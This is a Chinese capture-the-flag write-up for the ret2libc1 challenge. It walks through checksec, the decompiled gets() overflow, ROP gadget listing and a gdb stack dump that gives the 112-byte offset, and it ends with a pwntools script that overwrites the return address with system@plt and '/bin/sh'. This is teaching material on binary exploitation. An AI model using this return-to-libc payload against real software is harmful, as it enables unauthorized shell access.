一、题目
题目:ret2libc1
题目描述:返回地址更改为system@plt,再写入system@plt的虚假的返回地址,再写入system@plt的参数/bin/sh
二、WriteUp
1 . 信息收集
checksec ret2libc1
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE ( 0x8048000)
2 . ida+F5
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [esp+1Ch] [ebp-64h]
setvbuf(stdout, 0, 2, 0);
setvbuf(_bss_start, 0, 1, 0);
puts("RET2LIBC >_<");
gets(&s);
return 0;
}
function windows中包含_system和system函数,所以plt表中存在system的表项
在functions窗口搜索_system函数
.plt:08048460 jmp ds:off_804A018
.plt:08048460 _system endp
call system --- system@plt --- system@got --- system@plt ---resolve---把system真实地址填写到system@got --- system libc
call system --- system@plt --- system@got --- system libc
3 . ROPgadget --binary ret2libc1 --only "pop|ret"
Gadgets information
== == == == == == == == == == == == == == == == == == == == == == == == == == == == == ==
0x080486ef : pop ebp ; ret
0x080486ec : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804841d : pop ebx ; ret
0x080486ee : pop edi ; pop ebp ; ret
0x080486ed : pop esi ; pop edi ; pop ebp ; ret
0x08048406 : ret
0x0804854e : ret 0xeac1
4 . payload
最终要执行system( "/bin/sh" )
.rodata:08048720 aBinSh db '/bin/sh' ,0 ; DATA XREF: .data:shell↓o
system@plt地址
exit( ) 地址
"/bin/sh" 地址
0
5 . gdb ret2libc1
b main
r
n
输入AAAABBBBCCCCDDDD
00:0000│ esp 0xffffd110 —▸ 0xffffd12c ◂— 'AAAABBBBCCCCDDDD'
01:0004│ 0xffffd114 ◂— 0x0
02:0008│ 0xffffd118 ◂— 0x1
03:000c│ 0xffffd11c ◂— 0x0
.. . ↓ 3 skipped
07:001c│ eax 0xffffd12c ◂— 'AAAABBBBCCCCDDDD'
08:0020│ 0xffffd130 ◂— 'BBBBCCCCDDDD'
09:0024│ 0xffffd134 ◂— 'CCCCDDDD'
0a:0028│ 0xffffd138 ◂— 'DDDD'
0b:002c│ 0xffffd13c ◂— 0x0
0c:0030│ 0xffffd140 —▸ 0x80484d0 ( _start) ◂— xor ebp, ebp
0d:0034│ 0xffffd144 —▸ 0xf7fc9550 ( __kernel_vsyscall) ◂— push ecx
0e:0038│ 0xffffd148 —▸ 0x8048034 ◂— push es
0f:003c│ 0xffffd14c —▸ 0xf7fa5a08 ( __exit_funcs_lock) ◂— 0x0
10 :0040│ 0xffffd150 ◂— 0x1
11 :0044│ 0xffffd154 —▸ 0xf7fdc480 ( _dl_fini) ◂— push ebp
12 :0048│ 0xffffd158 ◂— 0x0
13 :004c│ 0xffffd15c —▸ 0x8048405 ( _init+9) ◂— add ebx, 0x1bfb
14 :0050│ 0xffffd160 —▸ 0xf7fa43fc ( __exit_funcs) —▸ 0xf7fa5a20 ( initial) ◂— 0x0
15 :0054│ 0xffffd164 ◂— 0xffffffff
16 :0058│ 0xffffd168 —▸ 0x804a000 ( _GLOBAL_OFFSET_TABLE_) —▸ 0x8049f14 ( _DYNAMIC) ◂— 0x1
17 :005c│ 0xffffd16c —▸ 0x80486e2 ( __libc_csu_init+82) ◂— add edi, 1
18 :0060│ 0xffffd170 ◂— 0x1
19 :0064│ 0xffffd174 —▸ 0xffffd244 —▸ 0xffffd3f0 ◂— '/home/uaoe/Desktop/ti/ROP/ret2libc1'
1a:0068│ 0xffffd178 —▸ 0xffffd24c —▸ 0xffffd414 ◂— 'SHELL=/usr/bin/zsh'
1b:006c│ 0xffffd17c —▸ 0xf7df0a15 ( __cxa_atexit+37) ◂— add esp, 0x1c
1c:0070│ 0xffffd180 —▸ 0xf7fdc480 ( _dl_fini) ◂— push ebp
1d:0074│ 0xffffd184 ◂— 0x0
1e:0078│ 0xffffd188 —▸ 0x804869b ( __libc_csu_init+11) ◂— add ebx, 0x1965
1f:007c│ 0xffffd18c ◂— 0x0
20 :0080│ 0xffffd190 ◂— 0x1
21 :0084│ 0xffffd194 —▸ 0x80484d0 ( _start) ◂— xor ebp, ebp
22 :0088│ ebp 0xffffd198 ◂— 0x0
23 :008c│ 0xffffd19c —▸ 0xf7dd7905 ( __libc_start_main+229) ◂— add esp, 0x10
ebp地址 - eax地址 = 0xffffd198 - 0xffffd12c + 0x4 = 112 字节
112 字节 + system返回地址 + exit返回地址 + "/bin/sh" + 0
6 .exp.py
from pwn import *
sh = process( "./ret2libc1" )
binsh_addr = 0x08048720
system_plt = 0x08048460
payload = flat( [ b'A' * 112 , system_plt,b'B' * 4 , binsh_addr] )
sh. sendline( payload)
sh. interactive( )
7 . 小技巧
elf= ELF( "./ret2libc1" )
system_plt = elf. plt[ "system" ]
next ( elf. search( b"/bin/sh" ) )
strings ret2libc1 | grep /bin/sh
三、总结
无